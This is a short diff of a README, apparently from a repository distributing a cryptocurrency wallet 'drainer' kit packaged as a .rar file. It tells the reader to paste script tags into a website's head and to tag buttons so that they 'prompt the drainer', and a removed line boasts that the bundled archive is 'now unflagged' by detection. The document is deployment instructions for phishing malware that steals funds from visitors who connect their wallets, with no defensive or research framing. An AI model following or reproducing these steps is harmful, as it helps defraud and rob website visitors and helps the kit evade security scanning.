wetinsupnah/Multi-Chain/README.md

   drainersystemonly.rar

 # STEP 1 (FOLLOW THE TUTORIAL IN THE UPDATED .RAR FOR STEP 1
-<script charset="UTF-8" type="text/javascript" src="./85562950-42ac-48d9-9757-cb0ae30ccb7c.js"></script>
+<script charset="UTF-8" async type="text/javascript" src="./a368b67175218.46f.js"></script>
-<!–– Please do not forgot to update the files.zip (now unflagged) ––>

-Paste these scripts in the head of your index.html of your website then add the class "interact-button" to any buttons that you want to prompt the drainer.
+Paste these scripts in the head of your index.html of your website then add the class "connectButton" to any buttons that you want to prompt the drainer.

 # STEP 2